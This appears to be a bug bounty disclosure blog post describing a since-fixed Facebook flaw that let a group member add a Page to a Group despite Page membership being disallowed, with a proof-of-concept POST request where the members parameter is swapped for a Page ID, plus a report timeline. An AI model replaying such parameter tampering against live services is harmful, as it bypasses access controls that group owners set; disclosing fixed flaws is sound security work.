[Facebook] Bypassing "Membership requests from Pages"

 Any Page could have joined a Group when "Membership requests from Pages" is set to Disallowed.

POC -

A Group member will make the following request -

=====================================================================

POST /ajax/groups/members/add_post/?dpr=1 HTTP/1.1

Host: www.facebook.com

group_id=XXX&members[0]=XXX&message_id=groupsAddMemberCompletionMessage&recommendation_key=default_XXX_XXX_0_1542532051_312&ref=&source=suggested_members_new&__user=XXX

=====================================================================

Here the "members[0]=" value could be changed to a Page's ID which he wanted to invite.

If this request was made by the Mod of a Group, no notification was sent to the Admin for Membership approval.

Timeline -

Reported - Sunday, November 18, 2018

Marked as Duplicate - Wednesday, November 21, 2018

This is fixed now.

Popular posts from this blog

[Google] Access to BGP server + DOM XSS

[Google] YouTube "restconf" Swagger-UI XSS

[Google] Disclose hidden Blogger profile Display name and Profile photo